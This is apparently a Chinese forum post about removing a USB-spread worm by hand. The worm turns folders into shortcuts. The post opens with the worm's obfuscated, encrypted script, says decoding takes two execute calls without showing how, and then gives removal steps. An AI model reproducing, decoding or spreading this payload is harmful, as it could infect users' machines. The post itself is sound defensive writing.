‘Ihy?llilyL_mog_yH_rn4>cgy;lam&yPclomFi[^&yPclom;mm4M_ny;lam7QM]lcjn(;laog_hnm4PclomFi[^7A_nG[chPclom”+#4Pclom;mm7A_nG[chPclom”*#4;laHog7*4>iyQbcf_y;laHogy6y;lam(=iohn4J[l[g7J[l[g {y{ ;lam”;laHog#4;laHog7;laHogy%y+4Fiijqr
‘}@-z,=,8gvm,>0R|423?Rz,=,8VJ]SSmk
‘Zlslj{‘Jhzl’Z|iWhyhtip
‘@^pb|~ork~rk
‘u92s%8,`o)*8Kzv’6-48Qv’6-48i900q%1)OCUL]f%00Cu92Ku92s%8,L]f%00Cl2:%()v=78)1Ky-697o3%(Oy-697d77L]f%00Cu92KEHv=78)1u338H 7=78)1 7:’,378Q)<)CEIy-697o3%(Lln
‘|;M?Y[NRN[eY[FIA[e[CHC[Ye[CH@[np
‘*MF(9L@tY\+QKL=E*GGL\4KQKL=Eji4&’,|(x{e|0|WY](9J9Eqz9DDW*MF_*MF(9L@`qz9DDW!FN9<=+QKL=E_.AJMK$G9<c.AJMKxKK`qz9DDW*MF_Y\+QKL=E*GGL\4KQKL=E4KN;@GKLe=P=WY].AJMK$G9<`nn
‘.L^PjlML_lvjlNXOlpm
…………………..
都是一堆乱码,可惜了,需要解密,解密需要用两次execute函数来解密,解密就不说了吧。。。喜欢研究的人可以去研究下,这个话题主要讨论手工查杀这个蠕虫病毒。。。
这个病毒其实很垃圾的,没什么破坏性,只是会把所有盘的文件夹变成快捷方式而已,只要把隐藏操作系统受保护的文件那里的 对号去掉,就是不让他隐藏,显示出来,把这两个文件删除就可以了,注意,要全盘都删除,只要有一个盘没删除,就会感染所有盘,我的好像是U盘感染了,手工查杀蠕虫病毒就是这样了,这个是比较低级的病毒,我把病毒提取出来了,下载了360杀毒软件,查杀下,杀软不报毒,虽然这个对电脑没什么大的危害,但是也具有恶意性了,所有有些东西,也不能全靠杀毒软件,不是有句话说:伤人之心不能有,防人之心不能没有,换到个人电脑上就应该讲:不防病毒之心不能有(防病毒之心不能没有),不用杀软之心不可有,嘿嘿,好像绕口令,这个病毒就是让我这么给清理掉的。。。